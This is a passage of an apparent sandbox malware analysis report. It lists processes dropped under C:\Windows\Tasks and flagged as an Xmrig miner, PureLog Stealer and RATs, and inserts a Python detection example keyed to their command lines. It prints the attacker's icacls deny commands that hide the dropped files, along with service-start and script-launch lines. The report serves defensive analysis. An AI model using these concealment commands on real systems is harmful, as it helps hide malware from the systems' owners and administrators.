                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4148260496.00000200331F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000003.1908406838.0000020033254000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: Florian Roth
                                                                                                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: ditekSHen
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 62%, ReversingLabs
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                  Start time:17:02:21
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0x7ff752040000
                                                                                                                                                                                                  File size:39'424 bytes
                                                                                                                                                                                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                  Start time:17:02:22
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\Superfetch.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Tasks\Superfetch.exe
                                                                                                                                                                                                  Imagebase:0x7ff638400000
                                                                                                                                                                                                  File size:1'702'912 bytes
                                                                                                                                                                                                  MD5 hash:362FFCE5C7C480702A615F1847191F62
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 68%, ReversingLabs
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                  Start time:17:02:22
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  Imagebase:0x7ff7b1d90000
                                                                                                                                                                                                  File size:8'939'797 bytes
                                                                                                                                                                                                  MD5 hash:92A9C0EF09F955F9F1BCA837D7AA493F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 54%, ReversingLabs
                                                                                                                                                                                                  Has exited:false
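
The records above show a sequence worth detecting as a unit: three icacls runs that add deny ACEs for Users, Administrators and the machine account on C:\Windows\Tasks (hiding the dropped files from anyone who might inspect them), followed by execution of Superfetch.exe, MSTask.exe and the look-alike ApplicationsFrameHost.exe (the genuine binary is ApplicationFrameHost.exe in System32) from that directory. The Python below is an added example, not part of the Joe Sandbox report or its Sigma rules: it runs that logic over process-creation events constructed from the command lines listed above (a constructed sample, not a captured log), flags icacls denies on the Tasks directory, execution from it, known system process names outside System32/SysWOW64, and near-miss names found by edit distance, then escalates when the lock-down and the execution occur on the same host. KNOWN_SYSTEM_IMAGES, the severity weights and the verdict thresholds are illustrative assumptions to tune for your environment.

```python
"""Detection logic for the sequence in the process list above: icacls deny ACEs on
C:\\Windows\\Tasks followed by execution of look-alike system binaries from there.
Added example, not part of the Joe Sandbox report."""
import re

# Constructed process-creation events modelled on the report's command lines
# (not a real log; pid 99 is a benign control for the genuine ApplicationFrameHost).
SAMPLE_EVENTS = [
    {"pid": 50, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized'},
    {"pid": 51, "image": r"C:\Windows\System32\icacls.exe",
     "cmdline": r'icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)"'},
    {"pid": 52, "image": r"C:\Windows\System32\icacls.exe",
     "cmdline": r'icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"'},
    {"pid": 53, "image": r"C:\Windows\Tasks\ApplicationsFrameHost.exe",
     "cmdline": r"C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized"},
    {"pid": 54, "image": r"C:\Windows\System32\icacls.exe",
     "cmdline": r'icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"'},
    {"pid": 55, "image": r"C:\Windows\Tasks\Superfetch.exe",
     "cmdline": r"C:\Windows\Tasks\Superfetch.exe"},
    {"pid": 56, "image": r"C:\Windows\Tasks\MSTask.exe",
     "cmdline": r"C:\Windows\Tasks\MSTask.exe"},
    {"pid": 58, "image": r"C:\Windows\SysWOW64\net.exe",
     "cmdline": r"net start WMService"},
    {"pid": 99, "image": r"C:\Windows\System32\ApplicationFrameHost.exe",
     "cmdline": r"C:\Windows\System32\ApplicationFrameHost.exe -Embedding"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumption: illustrative set of Windows process names to protect against
# masquerading (exact name outside a system dir) and typosquatting (near miss).
KNOWN_SYSTEM_IMAGES = {
    "applicationframehost.exe", "svchost.exe", "conhost.exe", "dllhost.exe",
    "taskhostw.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
}
# `icacls C:\Windows\Tasks /deny "<principal>:(...)"`; group 1 is the principal.
ICACLS_DENY_TASKS = re.compile(
    r'icacls(?:\.exe)?"?\s+"?c:\\windows\\tasks\\?"?\s+/deny\s+"?([^":]+):', re.I)
# Any .exe referenced under C:\Windows\Tasks, in the image path or command line.
TASKS_EXE = re.compile(r'c:\\windows\\tasks\\[^"\s]+\.exe', re.I)
# Assumption: weights and thresholds are illustrative.
SEVERITY = {"icacls_deny_tasks_dir": 2, "exec_from_tasks_dir": 2,
            "system_name_outside_system_dir": 2, "lookalike_system_name": 3}


def levenshtein(a, b):
    """Edit distance; catches one-character name forgeries like the extra 's'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _split(path):
    path = path.lower()
    idx = path.rfind("\\")
    return path[: idx + 1], path[idx + 1:]


def analyze_event(ev):
    """Return (rule, detail) findings for one process-creation event."""
    findings = []
    image_dir, image_name = _split(ev["image"])
    cmd = ev["cmdline"]
    m = ICACLS_DENY_TASKS.search(cmd)
    if m:
        findings.append(("icacls_deny_tasks_dir", m.group(1)))
    m = TASKS_EXE.search(cmd) or TASKS_EXE.search(ev["image"])
    if m:
        findings.append(("exec_from_tasks_dir", m.group(0)))
    if image_name in KNOWN_SYSTEM_IMAGES:
        if image_dir not in SYSTEM_DIRS:
            findings.append(("system_name_outside_system_dir", ev["image"]))
    else:
        near = sorted(k for k in KNOWN_SYSTEM_IMAGES if levenshtein(image_name, k) <= 2)
        if near:
            findings.append(("lookalike_system_name", f"{image_name} ~ {near[0]}"))
    return findings


def analyze_host(events):
    """Combine per-event findings; a host that both locks down C:\\Windows\\Tasks
    with deny ACEs and executes from it is escalated (the hide-then-run pattern)."""
    per_pid, rules_seen = {}, set()
    for ev in events:
        f = analyze_event(ev)
        if f:
            per_pid[ev["pid"]] = f
            rules_seen.update(rule for rule, _ in f)
    score = sum(SEVERITY[r] for r in rules_seen)
    if {"icacls_deny_tasks_dir", "exec_from_tasks_dir"} <= rules_seen:
        score += 5
    verdict = "high" if score >= 8 else "medium" if score >= 4 else "low" if score else "clean"
    return {"verdict": verdict, "score": score, "findings": per_pid}


if __name__ == "__main__":
    result = analyze_host(SAMPLE_EVENTS)
    print(result["verdict"], result["score"])
    for pid, f in sorted(result["findings"].items()):
        print(pid, f)
```

In production the `image` and `cmdline` fields come from Sysmon Event ID 1 or Security 4688, and the benign control (pid 99) stays clean because the exact name sits in System32. Note that the deny ACEs also stop an administrator from listing or reading the dropped files, so after confirming the incident they have to be removed first (icacls supports `/remove:d <principal>` for that) before the binaries can be collected.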

                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                  Start time:17:02:22
                                                                                                                                                                                                  Start date:08/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 58
Start time: 17:02:22
Start date: 08/12/2024
Path: C:\Windows\SysWOW64\net.exe
Wow64 process (32bit): true
Commandline: net start WMService
Imagebase: 0xf50000
File size: 47'104 bytes
MD5 hash: 31890A7DE89936F922D44D677F681A7F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 59
Start time: 17:02:22
Start date: 08/12/2024
Path: C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\net1 start WMService
Imagebase: 0x8a0000
File size: 139'776 bytes
MD5 hash: 2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 60
Start time: 17:02:22
Start date: 08/12/2024
Path: C:\Windows\Tasks\1.exe
Wow64 process (32bit): true
Commandline: "C:\windows\tasks\1.exe"
Imagebase: 0x3e0000
File size: 4'088'537 bytes
MD5 hash: E94C69B02CC5FB2B03FC32AA55760AAF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000003C.00000003.1921505628.0000000006A67000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000003C.00000003.1922516714.0000000006A62000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Tasks\1.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Tasks\1.exe, Author: Joe Security
Antivirus matches:
• Detection: 63%, ReversingLabs
Has exited: true

Target ID: 61
Start time: 17:02:23
Start date: 08/12/2024
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe"
Imagebase: 0xb0000
File size: 147'456 bytes
MD5 hash: FF00E0480075B095948000BDC66E81F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 62
Start time: 17:02:23
Start date: 08/12/2024
Path: C:\Windows\Tasks\MSTask.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Tasks\MSTask.exe
Imagebase: 0x7ff7b1d90000
File size: 8'939'797 bytes
MD5 hash: 92A9C0EF09F955F9F1BCA837D7AA493F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 63
Start time: 17:02:25
Start date: 08/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 64
Start time: 17:02:25
Start date: 08/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 65
Start time: 17:02:25
Start date: 08/12/2024
Path: C:\Windows\Bridgeprovider.exe
Wow64 process (32bit): false
Commandline: "C:\Windows/Bridgeprovider.exe"
Imagebase: 0xcb0000
File size: 3'766'784 bytes
MD5 hash: BF9DDFDD875FA2BADBE94E88A1FC4214
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000041.00000000.1945948494.0000000000CB2000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000041.00000002.2015361827.00000000137A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Bridgeprovider.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Bridgeprovider.exe, Author: Joe Security
Antivirus matches:
• Detection: 63%, ReversingLabs
Has exited: true

Target ID: 66
Start time: 17:02:29
Start date: 08/12/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
Imagebase: 0x7ff6aea70000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 67
Start time: 17:02:29
Start date: 08/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Execution Graph

Execution Coverage: 9.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 10.1%
Total number of Nodes: 1531
Total number of Limit Nodes: 30
24810->24808 24811 87a528 SetFileAttributesW 24810->24811 24811->24808 24812->24705 24813->24705 24814->24715 24815->24705 24816->24705 24817->24705 24819 880666 _wcslen 24818->24819 24846 8717e9 24819->24846 24821 88067e 24821->24719 24823 880659 _wcslen 24822->24823 24824 8717e9 78 API calls 24823->24824 24825 88067e 24824->24825 24825->24721 24827 877b17 __EH_prolog 24826->24827 24863 87ce40 24827->24863 24829 877b32 24830 88eb38 8 API calls 24829->24830 24831 877b5c 24830->24831 24869 884a76 24831->24869 24834 877c7d 24835 877c87 24834->24835 24837 877cf1 24835->24837 24898 87a56d 24835->24898 24839 877d50 24837->24839 24876 878284 24837->24876 24838 877d92 24838->24725 24839->24838 24904 87138b 74 API calls 24839->24904 24843 877bac 24842->24843 24845 877bb3 24842->24845 24844 882297 86 API calls 24843->24844 24844->24845 24847 8717ff 24846->24847 24858 87185a __InternalCxxFrameHandler 24846->24858 24848 871828 24847->24848 24859 876c36 76 API calls __vswprintf_c_l 24847->24859 24849 871887 24848->24849 24852 871847 ___std_exception_copy 24848->24852 24851 893e3e 22 API calls 24849->24851 24854 87188e 24851->24854 24852->24858 24861 876ca7 75 API calls 24852->24861 24853 87181e 24860 876ca7 75 API calls 24853->24860 24854->24858 24862 876ca7 75 API calls 24854->24862 24858->24821 24859->24853 24860->24848 24861->24858 24862->24858 24864 87ce4a __EH_prolog 24863->24864 24865 88eb38 8 API calls 24864->24865 24866 87ce8d 24865->24866 24867 88eb38 8 API calls 24866->24867 24868 87ceb1 24867->24868 24868->24829 24870 884a80 __EH_prolog 24869->24870 24871 88eb38 8 API calls 24870->24871 24872 884a9c 24871->24872 24873 877b8b 24872->24873 24875 880e46 80 API calls 24872->24875 24873->24834 24875->24873 24877 87828e __EH_prolog 24876->24877 24905 8713dc 24877->24905 24879 8782aa 24880 8782bb 24879->24880 25044 879f42 24879->25044 24884 8782f2 24880->24884 24913 871a04 24880->24913 24883 8782ee 24883->24884 24895 87a56d 7 API calls 24883->24895 24897 878389 
24883->24897 25048 87c0c5 CompareStringW _wcslen 24883->25048 25049 871692 24884->25049 24890 8783e8 24940 871f6d 24890->24940 24893 8783f3 24893->24884 24944 873b2d 24893->24944 24956 87848e 24893->24956 24895->24883 24932 878430 24897->24932 24899 87a582 24898->24899 24900 87a5b0 24899->24900 25311 87a69b 24899->25311 24900->24835 24902 87a592 24902->24900 24903 87a597 FindClose 24902->24903 24903->24900 24904->24838 24906 8713e1 __EH_prolog 24905->24906 24907 87ce40 8 API calls 24906->24907 24908 871419 24907->24908 24909 88eb38 8 API calls 24908->24909 24912 871474 _abort 24908->24912 24910 871461 24909->24910 24911 87b505 84 API calls 24910->24911 24910->24912 24911->24912 24912->24879 24914 871a0e __EH_prolog 24913->24914 24926 871a61 24914->24926 24929 871b9b 24914->24929 25053 8713ba 24914->25053 24917 871bc7 25056 87138b 74 API calls 24917->25056 24919 873b2d 102 API calls 24923 871c12 24919->24923 24920 871bd4 24920->24919 24920->24929 24921 871c5a 24925 871c8d 24921->24925 24921->24929 25057 87138b 74 API calls 24921->25057 24923->24921 24924 873b2d 102 API calls 24923->24924 24924->24923 24925->24929 24930 879e80 79 API calls 24925->24930 24926->24917 24926->24920 24926->24929 24927 873b2d 102 API calls 24928 871cde 24927->24928 24928->24927 24928->24929 24929->24883 24930->24928 24931 879e80 79 API calls 24931->24926 25075 87cf3d 24932->25075 24934 878440 25079 8813d2 GetSystemTime SystemTimeToFileTime 24934->25079 24936 8783a3 24936->24890 24937 881b66 24936->24937 25084 88de6b 24937->25084 24941 871f72 __EH_prolog 24940->24941 24943 871fa6 24941->24943 25092 8719af 24941->25092 24943->24893 24945 873b39 24944->24945 24946 873b3d 24944->24946 24945->24893 24955 879e80 79 API calls 24946->24955 24947 873b4f 24948 873b6a 24947->24948 24949 873b78 24947->24949 24950 873baa 24948->24950 25245 8732f7 90 API calls 2 library calls 24948->25245 25246 87286b 102 API calls 3 library calls 24949->25246 24950->24893 24953 873b76 24953->24950 25247 8720d7 74 API 
calls 24953->25247 24955->24947 24957 878498 __EH_prolog 24956->24957 24960 8784d5 24957->24960 24972 878513 24957->24972 25272 888c8d 104 API calls 24957->25272 24959 8784f5 24961 87851c 24959->24961 24962 8784fa 24959->24962 24960->24959 24965 87857a 24960->24965 24960->24972 24961->24972 25274 888c8d 104 API calls 24961->25274 24962->24972 25273 877a0d 153 API calls 24962->25273 24965->24972 25248 875d1a 24965->25248 24967 878605 24967->24972 25254 878167 24967->25254 24970 878797 24971 87a56d 7 API calls 24970->24971 24973 878802 24970->24973 24971->24973 24972->24893 25260 877c0d 24973->25260 24975 87d051 82 API calls 24981 87885d 24975->24981 24976 87898b 25277 872021 74 API calls 24976->25277 24977 878a5f 24982 878ab6 24977->24982 24996 878a6a 24977->24996 24978 878992 24978->24977 24984 8789e1 24978->24984 24981->24972 24981->24975 24981->24976 24981->24978 25275 878117 85 API calls 24981->25275 25276 872021 74 API calls 24981->25276 24988 878a4c 24982->24988 25280 877fc0 97 API calls 24982->25280 24983 878ab4 24989 87959a 80 API calls 24983->24989 24986 878b14 24984->24986 24984->24988 24990 87a231 3 API calls 24984->24990 24985 879105 24987 87959a 80 API calls 24985->24987 24986->24985 25004 878b82 24986->25004 25281 8798bc 24986->25281 24987->24972 24988->24983 24988->24986 24989->24972 24992 878a19 24990->24992 24992->24988 25278 8792a3 97 API calls 24992->25278 24994 87ab1a 8 API calls 24997 878bd1 24994->24997 24996->24983 25279 877db2 101 API calls 24996->25279 24999 87ab1a 8 API calls 24997->24999 25018 878be7 24999->25018 25002 878b70 25285 876e98 77 API calls 25002->25285 25004->24994 25005 878cbc 25006 878e40 25005->25006 25007 878d18 25005->25007 25009 878e66 25006->25009 25010 878e52 25006->25010 25030 878d49 25006->25030 25008 878d8a 25007->25008 25011 878d28 25007->25011 25015 878167 19 API calls 25008->25015 25013 883377 75 API calls 25009->25013 25012 879215 124 API calls 25010->25012 25014 878d6e 25011->25014 25019 878d37 25011->25019 
25012->25030 25016 878e7f 25013->25016 25014->25030 25288 8777b8 111 API calls 25014->25288 25020 878dbd 25015->25020 25022 883020 124 API calls 25016->25022 25017 878c93 25017->25005 25286 879a3c 82 API calls 25017->25286 25018->25005 25018->25017 25025 87981a 79 API calls 25018->25025 25287 872021 74 API calls 25019->25287 25026 878de6 25020->25026 25027 878df5 25020->25027 25020->25030 25022->25030 25025->25017 25289 877542 85 API calls 25026->25289 25290 879155 93 API calls __EH_prolog 25027->25290 25035 878f85 25030->25035 25291 872021 74 API calls 25030->25291 25032 879090 25032->24985 25034 87a4ed 3 API calls 25032->25034 25033 87903e 25267 879da2 25033->25267 25037 8790eb 25034->25037 25035->24985 25035->25032 25035->25033 25266 879f09 SetEndOfFile 25035->25266 25037->24985 25292 872021 74 API calls 25037->25292 25039 879085 25040 879620 77 API calls 25039->25040 25040->25032 25042 8790fb 25293 876dcb 76 API calls 25042->25293 25045 879f59 25044->25045 25046 879f63 25045->25046 25309 876d0c 78 API calls 25045->25309 25046->24880 25048->24883 25050 8716a4 25049->25050 25310 87cee1 86 API calls 25050->25310 25058 871732 25053->25058 25055 8713d6 25055->24931 25056->24929 25057->24925 25059 871748 25058->25059 25070 8717a0 __InternalCxxFrameHandler 25058->25070 25060 871771 25059->25060 25071 876c36 76 API calls __vswprintf_c_l 25059->25071 25062 8717c7 25060->25062 25067 87178d ___std_exception_copy 25060->25067 25064 893e3e 22 API calls 25062->25064 25063 871767 25072 876ca7 75 API calls 25063->25072 25066 8717ce 25064->25066 25066->25070 25074 876ca7 75 API calls 25066->25074 25067->25070 25073 876ca7 75 API calls 25067->25073 25070->25055 25071->25063 25072->25060 25073->25070 25074->25070 25076 87cf4d 25075->25076 25078 87cf54 25075->25078 25080 87981a 25076->25080 25078->24934 25079->24936 25081 879833 25080->25081 25083 879e80 79 API calls 25081->25083 25082 879865 25082->25078 25083->25082 25085 88de78 25084->25085 25086 87e617 53 API calls 
25085->25086 25087 88de9b 25086->25087 25088 874092 _swprintf 51 API calls 25087->25088 25089 88dead 25088->25089 25090 88d4d4 16 API calls 25089->25090 25091 881b7c 25090->25091 25091->24890 25093 8719bf 25092->25093 25095 8719bb 25092->25095 25096 8718f6 25093->25096 25095->24943 25097 871908 25096->25097 25098 871945 25096->25098 25099 873b2d 102 API calls 25097->25099 25104 873fa3 25098->25104 25102 871928 25099->25102 25102->25095 25108 873fac 25104->25108 25105 873b2d 102 API calls 25105->25108 25106 871966 25106->25102 25109 871e50 25106->25109 25108->25105 25108->25106 25121 880e08 25108->25121 25110 871e5a __EH_prolog 25109->25110 25129 873bba 25110->25129 25112 871e84 25113 871732 78 API calls 25112->25113 25115 871f0b 25112->25115 25114 871e9b 25113->25114 25157 8718a9 78 API calls 25114->25157 25115->25102 25117 871eb3 25119 871ebf _wcslen 25117->25119 25158 881b84 MultiByteToWideChar 25117->25158 25159 8718a9 78 API calls 25119->25159 25122 880e0f 25121->25122 25125 880e2a 25122->25125 25127 876c31 RaiseException _com_raise_error 25122->25127 25124 880e3b SetThreadExecutionState 25124->25108 25125->25124 25128 876c31 RaiseException _com_raise_error 25125->25128 25127->25125 25128->25124 25130 873bc4 __EH_prolog 25129->25130 25131 873bf6 25130->25131 25132 873bda 25130->25132 25134 873e51 25131->25134 25137 873c22 25131->25137 25185 87138b 74 API calls 25132->25185 25210 87138b 74 API calls 25134->25210 25136 873be5 25136->25112 25137->25136 25160 883377 25137->25160 25139 873ca3 25140 873d2e 25139->25140 25156 873c9a 25139->25156 25188 87d051 25139->25188 25170 87ab1a 25140->25170 25141 873c9f 25141->25139 25187 8720bd 78 API calls 25141->25187 25143 873c71 25143->25139 25143->25141 25144 873c8f 25143->25144 25186 87138b 74 API calls 25144->25186 25146 873d41 25150 873dd7 25146->25150 25151 873dc7 25146->25151 25194 883020 25150->25194 25174 879215 25151->25174 25154 873dd5 25154->25156 25203 872021 74 API calls 25154->25203 25204 882297 25156->25204 
25157->25117 25158->25119 25159->25115 25161 88338c 25160->25161 25163 883396 ___std_exception_copy 25160->25163 25211 876ca7 75 API calls 25161->25211 25164 88341c 25163->25164 25165 8834c6 25163->25165 25169 883440 _abort 25163->25169 25212 8832aa 75 API calls 3 library calls 25164->25212 25213 89238d RaiseException 25165->25213 25168 8834f2 25169->25143 25171 87ab28 25170->25171 25173 87ab32 25170->25173 25172 88eb38 8 API calls 25171->25172 25172->25173 25173->25146 25175 87921f __EH_prolog 25174->25175 25214 877c64 25175->25214 25178 8713ba 78 API calls 25179 879231 25178->25179 25217 87d114 25179->25217 25181 87928a 25181->25154 25183 87d114 119 API calls 25184 879243 25183->25184 25184->25181 25184->25183 25226 87d300 97 API calls __InternalCxxFrameHandler 25184->25226 25185->25136 25186->25156 25187->25139 25189 87d084 25188->25189 25190 87d072 25188->25190 25228 87603a 82 API calls 25189->25228 25227 87603a 82 API calls 25190->25227 25193 87d07c 25193->25140 25195 883029 25194->25195 25196 883052 25194->25196 25198 883048 25195->25198 25199 88303e 25195->25199 25201 883046 25195->25201 25196->25201 25243 88552f 124 API calls 2 library calls 25196->25243 25242 88624a 119 API calls 25198->25242 25229 886cdc 25199->25229 25201->25154 25203->25156 25205 8822a1 25204->25205 25206 8822ba 25205->25206 25209 8822ce 25205->25209 25244 880eed 86 API calls 25206->25244 25208 8822c1 25208->25209 25210->25136 25211->25163 25212->25169 25213->25168 25215 87b146 GetVersionExW 25214->25215 25216 877c69 25215->25216 25216->25178 25223 87d12a __InternalCxxFrameHandler 25217->25223 25218 87d29a 25219 87d2ce 25218->25219 25220 87d0cb 6 API calls 25218->25220 25221 880e08 SetThreadExecutionState RaiseException 25219->25221 25220->25219 25224 87d291 25221->25224 25222 888c8d 104 API calls 25222->25223 25223->25218 25223->25222 25223->25224 25225 87ac05 91 API calls 25223->25225 25224->25184 25225->25223 25226->25184 25227->25193 25228->25193 25230 88359e 75 API calls 
25229->25230 25231 886ced __InternalCxxFrameHandler 25230->25231 25232 87d114 119 API calls 25231->25232 25233 8870fe 25231->25233 25236 8811cf 81 API calls 25231->25236 25237 883e0b 119 API calls 25231->25237 25238 887153 119 API calls 25231->25238 25239 880f86 88 API calls 25231->25239 25240 8877ef 124 API calls 25231->25240 25241 88390d 98 API calls 25231->25241 25232->25231 25234 885202 98 API calls 25233->25234 25235 88710e __InternalCxxFrameHandler 25234->25235 25235->25201 25236->25231 25237->25231 25238->25231 25239->25231 25240->25231 25241->25231 25242->25201 25243->25201 25244->25208 25245->24953 25246->24953 25247->24950 25249 875d2a 25248->25249 25294 875c4b 25249->25294 25252 875d5d 25253 875d95 25252->25253 25299 87b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25252->25299 25253->24967 25255 878186 25254->25255 25256 878232 25255->25256 25306 87be5e 19 API calls __InternalCxxFrameHandler 25255->25306 25305 881fac CharUpperW 25256->25305 25259 87823b 25259->24970 25261 877c22 25260->25261 25262 877c5a 25261->25262 25307 876e7a 74 API calls 25261->25307 25262->24981 25264 877c52 25308 87138b 74 API calls 25264->25308 25266->25033 25268 879db3 25267->25268 25270 879dc2 25267->25270 25269 879db9 FlushFileBuffers 25268->25269 25268->25270 25269->25270 25271 879e3f SetFileTime 25270->25271 25271->25039 25272->24960 25273->24972 25274->24972 25275->24981 25276->24981 25277->24978 25278->24988 25279->24983 25280->24988 25282 8798c5 GetFileType 25281->25282 25283 878b5a 25281->25283 25282->25283 25283->25004 25284 872021 74 API calls 25283->25284 25284->25002 25285->25004 25286->25005 25287->25030 25288->25030 25289->25030 25290->25030 25291->25035 25292->25042 25293->24985 25300 875b48 25294->25300 25297 875c6c 25297->25252 25298 875b48 2 API calls 25298->25297 25299->25252 25301 875b52 25300->25301 25303 875c3a 25301->25303 25304 87b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25301->25304 25303->25297 25303->25298 25304->25301 
